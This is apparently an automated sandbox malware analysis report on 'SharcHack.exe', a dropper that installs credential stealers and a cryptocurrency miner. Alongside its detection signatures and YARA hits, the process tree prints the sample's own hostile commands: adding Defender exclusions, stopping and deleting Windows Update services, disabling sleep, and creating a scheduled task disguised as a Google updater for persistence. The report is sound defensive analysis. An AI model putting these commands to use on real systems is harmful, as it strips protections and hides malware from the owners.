Edit tour
Windows
Analysis Report
SharcHack.exe
Overview
General Information
Detection
Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Yara detected Ades Stealer
Yara detected BlackGuard
Yara detected Nitro Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected VEGA Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses Register-ScheduledTask to add task schedules
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
query blbeacon for getting browser version
Classification
- System is w10x64
- SharcHack.exe (PID: 6192 cmdline:
"C:\Users\ user\Deskt op\SharcHa ck.exe" MD5: 796310542E9FB2886DE3F8CBDF88C9FA) - 3.exe (PID: 1988 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\3.exe" MD5: A4C45AAF11FC601009A5682FD23790EE) - VegaStealer_v2.exe (PID: 3252 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\VegaSt ealer_v2.e xe" MD5: 9F4F298BCF1D208BD3CE3907CFB28480) - v2.exe (PID: 5316 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\v2.exe " MD5: 3F62213D184B639A0A62BCB1E65370A8) - CheatEngine75.exe (PID: 2148 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\CheatE ngine75.ex e" MD5: CCEF241F10766A2E12298FBA4D319450) - CheatEngine75.tmp (PID: 6476 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\is-O39 K6.tmp\Che atEngine75 .tmp" /SL5 ="$50416,2 9079073,83 2512,C:\Us ers\user\A ppData\Loc al\Temp\Ch eatEngine7 5.exe" MD5: E652D75D1D0D3F03B6B730E064E9194C)
- powershell.exe (PID: 6176 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amFiles) - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3176 cmdline:
C:\Windows \System32\ cmd.exe /c sc stop U soSvc & sc stop WaaS MedicSvc & sc stop w uauserv & sc stop bi ts & sc st op dosvc & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\UsoSvc" /f & reg d elete "HKL M\SYSTEM\C urrentCont rolSet\Ser vices\WaaS MedicSvc" /f & reg d elete "HKL M\SYSTEM\C urrentCont rolSet\Ser vices\wuau serv" /f & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\bits" /f & reg del ete "HKLM\ SYSTEM\Cur rentContro lSet\Servi ces\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 5356 cmdline:
sc stop Us oSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 3292 cmdline:
sc stop Wa aSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 1052 cmdline:
sc stop wu auserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 2200 cmdline:
sc stop bi ts MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 2360 cmdline:
sc stop do svc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - reg.exe (PID: 6532 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \UsoSvc" / f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 6520 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \WaaSMedic Svc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 6180 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 5660 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 6540 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- cmd.exe (PID: 6400 cmdline:
C:\Windows \System32\ cmd.exe /c powercfg /x -hibern ate-timeou t-ac 0 & p owercfg /x -hibernat e-timeout- dc 0 & pow ercfg /x - standby-ti meout-ac 0 & powercf g /x -stan dby-timeou t-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4984 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 6332 cmdline:
powercfg / x -hiberna te-timeout -ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 2820 cmdline:
powercfg / x -hiberna te-timeout -dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 5880 cmdline:
powercfg / x -standby -timeout-a c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 5524 cmdline:
powercfg / x -standby -timeout-d c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- powershell.exe (PID: 3716 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# zfjwxc#> I F((New-Obj ect Securi ty.Princip al.Windows Principal( [Security. Principal. WindowsIde ntity]::Ge tCurrent() )).IsInRol e([Securit y.Principa l.WindowsB uiltInRole ]::Adminis trator)) { IF([Syste m.Environm ent]::OSVe rsion.Vers ion -lt [S ystem.Vers ion]"6.2") { schtask s /create /f /sc onl ogon /rl h ighest /ru 'System' /tn 'Googl eUpdateTas kMachineQC ' /tr '''C :\Program Files\Goog le\Chrome\ updater.ex e''' } Els e { Regist er-Schedul edTask -Ac tion (New- ScheduledT askAction -Execute ' C:\Program Files\Goo gle\Chrome \updater.e xe') -Trig ger (New-S cheduledTa skTrigger -AtStartup ) -Setting s (New-Sch eduledTask SettingsSe t -AllowSt artIfOnBat teries -Di sallowHard Terminate -DontStopI fGoingOnBa tteries -D ontStopOnI dleEnd -Ex ecutionTim eLimit (Ne w-TimeSpan -Days 100 0)) -TaskN ame 'Googl eUpdateTas kMachineQC ' -User 'S ystem' -Ru nLevel 'Hi ghest' -Fo rce; } } E lse { reg add "HKCU\ SOFTWARE\M icrosoft\W indows\Cur rentVersio n\Run" /v "GoogleUpd ateTaskMac hineQC" /t REG_SZ /f /d 'C:\Pr ogram File s\Google\C hrome\upda ter.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6768 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1848 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# tugby#> IF ((New-Obje ct Securit y.Principa l.WindowsP rincipal([ Security.P rincipal.W indowsIden tity]::Get Current()) ).IsInRole ([Security .Principal .WindowsBu iltInRole] ::Administ rator)) { schtasks / run /tn "G oogleUpdat eTaskMachi neQC" } El se { "C:\P rogram Fil es\Google\ Chrome\upd ater.exe" } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6464 cmdline:
"C:\Window s\system32 \schtasks. exe" /run /tn Google UpdateTask MachineQC MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- updater.exe (PID: 1396 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\updater. exe" MD5: A4C45AAF11FC601009A5682FD23790EE) - conhost.exe (PID: 360 cmdline:
C:\Windows \System32\ conhost.ex e ubulqosn MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1196 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amFiles) - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6760 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5416 cmdline:
C:\Windows \System32\ cmd.exe /c sc stop U soSvc & sc stop WaaS MedicSvc & sc stop w uauserv & sc stop bi ts & sc st op dosvc & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\UsoSvc" /f & reg d elete "HKL M\SYSTEM\C urrentCont rolSet\Ser vices\WaaS MedicSvc" /f & reg d elete "HKL M\SYSTEM\C urrentCont rolSet\Ser vices\wuau serv" /f & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\bits" /f & reg del ete "HKLM\ SYSTEM\Cur rentContro lSet\Servi ces\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5584 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 360 cmdline:
sc stop Us oSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 4984 cmdline:
sc stop Wa aSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 4028 cmdline:
sc stop wu auserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 7060 cmdline:
sc stop bi ts MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 2664 cmdline:
sc stop do svc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - reg.exe (PID: 2800 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \UsoSvc" / f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 6768 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \WaaSMedic Svc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 6176 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 6400 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - reg.exe (PID: 7088 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- cmd.exe (PID: 6728 cmdline:
C:\Windows \System32\ cmd.exe /c powercfg /x -hibern ate-timeou t-ac 0 & p owercfg /x -hibernat e-timeout- dc 0 & pow ercfg /x - standby-ti meout-ac 0 & powercf g /x -stan dby-timeou t-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 5852 cmdline:
powercfg / x -hiberna te-timeout -ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 4956 cmdline:
powercfg / x -hiberna te-timeout -dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 344 cmdline:
powercfg / x -standby -timeout-a c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 2300 cmdline:
powercfg / x -standby -timeout-d c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- powershell.exe (PID: 3528 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# zfjwxc#> I F((New-Obj ect Securi ty.Princip al.Windows Principal( [Security. Principal. WindowsIde ntity]::Ge tCurrent() )).IsInRol e([Securit y.Principa l.WindowsB uiltInRole ]::Adminis trator)) { IF([Syste m.Environm ent]::OSVe rsion.Vers ion -lt [S ystem.Vers ion]"6.2") { schtask s /create /f /sc onl ogon /rl h ighest /ru 'System' /tn 'Googl eUpdateTas kMachineQC ' /tr '''C :\Program Files\Goog le\Chrome\ updater.ex e''' } Els e { Regist er-Schedul edTask -Ac tion (New- ScheduledT askAction -Execute ' C:\Program Files\Goo gle\Chrome \updater.e xe') -Trig ger (New-S cheduledTa skTrigger -AtStartup ) -Setting s (New-Sch eduledTask SettingsSe t -AllowSt artIfOnBat teries -Di sallowHard Terminate -DontStopI fGoingOnBa tteries -D ontStopOnI dleEnd -Ex ecutionTim eLimit (Ne w-TimeSpan -Days 100 0)) -TaskN ame 'Googl eUpdateTas kMachineQC ' -User 'S ystem' -Ru nLevel 'Hi ghest' -Fo rce; } } E lse { reg add "HKCU\ SOFTWARE\M icrosoft\W indows\Cur rentVersio n\Run" /v "GoogleUpd ateTaskMac hineQC" /t REG_SZ /f /d 'C:\Pr ogram File s\Google\C hrome\upda ter.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3836 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5520 cmdline:
C:\Windows \System32\ cmd.exe /c wmic PATH Win32_Vid eoControll er GET Nam e, VideoPr ocessor > "C:\Progra m Files\Go ogle\Libs\ g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6392 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5796 cmdline:
C:\Windows \System32\ cmd.exe /c wmic PATH Win32_Vid eoControll er GET Nam e, VideoPr ocessor > "C:\Progra m Files\Go ogle\Libs\ g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
BlackGuard | According to Zscaler, BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security | ||
JoeSecurity_NitroStealer | Yara detected Nitro Stealer | Joe Security | ||
JoeSecurity_BlackGuard | Yara detected BlackGuard | Joe Security | ||
JoeSecurity_VEGAStealer | Yara detected VEGA Stealer | Joe Security | ||
JoeSecurity_AdesStealer | Yara detected Ades Stealer | Joe Security | ||
Click to see the 9 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NitroStealer | Yara detected Nitro Stealer | Joe Security | ||
JoeSecurity_BlackGuard | Yara detected BlackGuard | Joe Security | ||
JoeSecurity_VEGAStealer | Yara detected VEGA Stealer | Joe Security | ||
JoeSecurity_AdesStealer | Yara detected Ades Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 29 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NitroStealer | Yara detected Nitro Stealer | Joe Security | ||
JoeSecurity_BlackGuard | Yara detected BlackGuard | Joe Security | ||
JoeSecurity_VEGAStealer | Yara detected VEGA Stealer | Joe Security | ||
JoeSecurity_AdesStealer | Yara detected Ades Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 11 entries |
Operating System Destruction |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |